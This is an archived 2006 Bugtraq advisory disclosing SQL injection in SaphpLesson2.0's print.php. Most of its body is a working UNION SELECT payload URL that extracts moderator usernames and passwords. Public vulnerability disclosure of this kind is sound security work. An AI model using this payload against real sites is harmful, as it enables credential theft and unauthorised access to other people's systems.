SQL Injection in SaphpLesson2.0

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SQL Injection in SaphpLesson2.0
From: xx_hack_xx_2004@xxxxxxxxxxx
Date: 25 Mar 2006 23:44:57 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hi
Vulnerable: SaphpLesson2.0
http://www.Arabless.com

Exploit :
http://Example.com/lesson/print.php?lessid=[SQL]

Example :
For Name & Passowrd
http://Example.com/lesson/print.php?lessid=-1%20union%20select%20null,null,null,ModName,null,ModPassword,null,ModPassword,null,ModPassword,null,null,null,null%20FROM%20modretor

Discovery by Linux_Drox

http://www.LeZr.Com

Best Regards ,,

Prev by Date: UBBThreads<=5.5.1+6.0.2+6.0 br5+6.0.1 SQL injection
Next by Date: HPSBUX02108 SSRT061133 rev.1 - HP-UX Sendmail, Remote Execution
Previous by thread: UBBThreads<=5.5.1+6.0.2+6.0 br5+6.0.1 SQL injection
Next by thread: HPSBUX02108 SSRT061133 rev.1 - HP-UX Sendmail, Remote Execution
Index(es):
- Date
- Thread